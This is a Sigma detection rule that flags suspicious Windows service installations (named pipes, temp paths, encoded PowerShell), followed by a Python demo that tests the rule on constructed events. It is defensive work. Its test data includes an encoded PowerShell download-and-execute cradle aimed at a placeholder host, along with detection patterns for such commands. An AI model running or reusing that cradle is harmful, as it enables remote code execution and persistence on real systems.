Uncommon Service Installation Image Path

Detects uncommon service installations (Windows System log, Service Control Manager Event ID 7045) whose ImagePath points to a named pipe (\\.\pipe), \Users\Public\ or \Windows\Temp\, or carries a PowerShell -e/-EncodedCommand flag together with a base64 prefix characteristic of an encoded "iex"/"IEX", a "$variable" or a "<#" comment. Image paths belonging to Windows Defender definition updates and THOR remote scans are filtered out.

Sigma rule

title: Uncommon Service Installation Image Path
id: 26481afe-db26-4228-b264-25a29fe6efc7
related:
    - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53
      type: obsoletes
    - id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b
      type: derived
status: test
description: |
    Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
references:
    - Internal Research
author: Florian Roth (Nextron Systems)
date: 2022/03/18
modified: 2024/02/09
tags:
    - attack.persistence
    - attack.privilege_escalation
    - car.2013-09-005
    - attack.t1543.003
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
    suspicious_paths:
        ImagePath|contains:
            - '\\\\.\\pipe'        # \\.\pipe (named pipe used as service binary, e.g. PsExec-style getsystem)
            - '\Users\Public\'
            - '\Windows\Temp\'
    suspicious_encoded_flag:
        ImagePath|contains: ' -e'  # also covers ' -enc' and ' -EncodedCommand'
    suspicious_encoded_keywords:
        ImagePath|contains:
            - ' aQBlAHgA' # "iex" as UTF-16LE base64 (PowerShell -EncodedCommand)
            - ' aWV4I' # "iex " as UTF-8 base64
            - ' IAB' # UTF-16LE base64 of a space followed by a letter
            - ' JAB' # UTF-16LE base64 of "$" followed by a letter (variable reference)
            - ' PAA' # UTF-16LE base64 of "<" followed by a low byte, e.g. "<#" (comment opener)
            - ' SQBFAFgA' # "IEX" as UTF-16LE base64
            - ' SUVYI' # "IEX " as UTF-8 base64
    filter_optional_thor_remote:
        ImagePath|startswith: 'C:\WINDOWS\TEMP\thor10-remote\thor64.exe'
    filter_main_defender_def_updates:
        ImagePath|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Definition Updates\'
    condition: selection and ( suspicious_paths or all of suspicious_encoded_* ) and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium
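As an added illustration (example code, not part of the rule above or of the Sigma project), the condition of the rule implemented in Python and run over a handful of constructed Event ID 7045 records, plus a helper that shows where the base64 keyword prefixes come from by encoding "iex", "IEX", "$x", "<#" and a leading space the way PowerShell's -EncodedCommand (UTF-16LE) or a plain UTF-8 encoder would. The event dictionary layout, the sample ImagePath values and the host example.invalid are assumptions for the demo.

```python
import base64

# Match values copied from the rule. Sigma's `contains`/`startswith` modifiers
# compare case-insensitively, so every comparison lower-cases both sides.
SUSPICIOUS_PATHS = ["\\\\.\\pipe", "\\Users\\Public\\", "\\Windows\\Temp\\"]
ENCODED_FLAG = " -e"  # also matches " -enc" and " -EncodedCommand"
ENCODED_KEYWORDS = [" aQBlAHgA", " aWV4I", " IAB", " JAB", " PAA", " SQBFAFgA", " SUVYI"]
FILTER_MAIN = ["C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\"]
FILTER_OPTIONAL = ["C:\\WINDOWS\\TEMP\\thor10-remote\\thor64.exe"]


def _contains_any(value, needles):
    value = value.lower()
    return any(n.lower() in value for n in needles)


def _startswith_any(value, prefixes):
    value = value.lower()
    return any(value.startswith(p.lower()) for p in prefixes)


def matches(event):
    """Evaluate the rule's condition against one parsed System-log event:
    selection and (suspicious_paths or all of suspicious_encoded_*)
    and not 1 of filter_main_* and not 1 of filter_optional_*
    """
    if event.get("Provider_Name") != "Service Control Manager" or event.get("EventID") != 7045:
        return False
    image_path = event.get("ImagePath", "")
    suspicious_paths = _contains_any(image_path, SUSPICIOUS_PATHS)
    # "all of suspicious_encoded_*": the -e flag AND one of the base64 prefixes.
    suspicious_encoded = (_contains_any(image_path, [ENCODED_FLAG])
                          and _contains_any(image_path, ENCODED_KEYWORDS))
    if not (suspicious_paths or suspicious_encoded):
        return False
    return not (_startswith_any(image_path, FILTER_MAIN)
                or _startswith_any(image_path, FILTER_OPTIONAL))


def encoded_prefix(text, utf16=True):
    """Base64 that PowerShell -EncodedCommand (UTF-16LE) or a plain UTF-8
    encoder produces for `text`; the rule's keywords are the leading
    characters of such strings."""
    raw = text.encode("utf-16-le" if utf16 else "utf-8")
    return base64.b64encode(raw).decode()


def _event(image_path, event_id=7045):
    # Assumed field layout of a parsed System-log record (constructed, not real data).
    return {"Provider_Name": "Service Control Manager", "EventID": event_id,
            "ImagePath": image_path}


# Constructed sample events; the encoded command starts with "iex", so its
# base64 begins with "aQBlAHgA".
_ENCODED = encoded_prefix("iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")
SAMPLES = {
    "temp_dir": _event("C:\\Windows\\Temp\\svc.exe"),
    "named_pipe": _event("%COMSPEC% /c echo x > \\\\.\\pipe\\svcpipe"),
    "encoded_iex": _event("powershell.exe -nop -w hidden -e " + _ENCODED),
    "flag_without_base64": _event("C:\\Tools\\agent.exe -e production"),
    "thor_filtered": _event("C:\\WINDOWS\\TEMP\\thor10-remote\\thor64.exe"),
    "benign": _event("C:\\Program Files\\Example\\svc.exe"),
    "wrong_event_id": _event("C:\\Windows\\Temp\\svc.exe", event_id=7036),
}


def run_samples():
    return {name: matches(ev) for name, ev in SAMPLES.items()}


if __name__ == "__main__":
    for name, hit in run_samples().items():
        print(("ALERT " if hit else "ok    ") + name)
    for text, utf16 in [("iex", True), ("IEX", True), ("iex ", False), ("IEX ", False),
                        ("$x", True), ("<#", True), (" s", True)]:
        print(repr(text), "utf16le" if utf16 else "utf8", encoded_prefix(text, utf16))
```

Two points the run makes visible: " -e" on its own is far too common a substring to alert on, which is why the condition requires both encoded sub-selections ("flag_without_base64" stays quiet), and the THOR filter only matters because its binary lives under \Windows\Temp\ and would otherwise trip suspicious_paths. Because the comparison is case-insensitive, as it is in most Sigma backends, the base64 keywords match slightly more than the exact prefixes shown; the UTF-16LE prefixes are specific enough that this rarely matters in practice.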
